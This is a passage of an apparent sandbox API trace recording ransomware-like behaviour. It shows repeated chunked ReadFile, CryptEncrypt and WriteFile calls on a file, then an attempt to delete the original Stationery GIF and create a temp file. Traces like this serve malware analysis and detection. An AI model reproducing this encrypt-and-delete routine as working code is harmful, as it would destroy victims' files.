CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.416] GetLastError () returned 0x0 [0166.416] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.416] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.416] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.416] GetLastError () returned 0x0 [0166.416] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.416] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.416] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.416] GetLastError () returned 0x0 [0166.416] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.416] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.416] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.416] GetLastError () returned 0x0 [0166.416] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.416] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.416] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.416] GetLastError () returned 0x0 [0166.416] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.416] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.416] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.416] GetLastError () returned 0x0 [0166.416] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.416] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.417] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.417] GetLastError () returned 0x0 [0166.417] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.417] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.417] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.417] GetLastError () returned 0x0 [0166.417] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.417] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.417] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.417] GetLastError () returned 0x0 [0166.417] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.417] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.417] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.417] GetLastError () returned 0x0 [0166.417] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.417] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.417] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.417] GetLastError () returned 0x0 [0166.417] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.417] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.417] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.417] GetLastError () returned 0x0 [0166.417] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.417] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.417] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.417] GetLastError () returned 0x0 [0166.417] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.418] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.418] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.418] GetLastError () returned 0x0 [0166.418] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.418] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.418] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.418] GetLastError () returned 0x0 [0166.418] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.418] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.418] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.418] GetLastError () returned 0x0 [0166.418] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.418] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.418] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.418] GetLastError () returned 0x0 [0166.418] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.418] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.418] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.418] GetLastError () returned 0x0 [0166.418] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.418] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.418] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.418] GetLastError () returned 0x0 [0166.418] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.419] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.419] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.419] GetLastError () returned 0x0 [0166.419] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.419] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.419] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.419] GetLastError () returned 0x0 [0166.419] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.419] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.419] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.419] GetLastError () returned 0x0 [0166.419] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.419] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.419] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.419] GetLastError () returned 0x0 [0166.419] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.419] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.419] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.419] GetLastError () returned 0x0 [0166.419] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.419] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.419] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.419] GetLastError () returned 0x0 [0166.419] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.419] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.420] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.420] GetLastError () returned 0x0 [0166.420] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.420] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.420] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.420] GetLastError () returned 0x0 [0166.420] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.420] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.420] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.420] GetLastError () returned 0x0 [0166.420] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.420] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.420] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.420] GetLastError () returned 0x0 [0166.420] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.420] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0xd7, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0xd7, lpOverlapped=0x0) returned 1 [0166.420] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xd7, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xe0) returned 1 [0166.420] GetLastError () returned 0x0 [0166.420] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0xe0, lpOverlapped=0x0) returned 1 [0166.420] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0166.420] WriteFile (in: hFile=0x15c4, lpBuffer=0x2895990*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0166.420] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Wrinkled_Paper.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\wrinkled_paper.gif")) returned 0x20 [0166.420] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Wrinkled_Paper.gif", dwFileAttributes=0x20) returned 0 [0166.421] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Wrinkled_Paper.gif") returned 1 [0166.421] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Wrinkled_Paper.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\wrinkled_paper.gif")) returned 0 [0166.421] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Wrinkled_Paper.gif" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Wrinkled_Paper.gif") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Wrinkled_Paper.gif" [0166.421] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Wrinkled_Paper.gif" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0166.421] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", 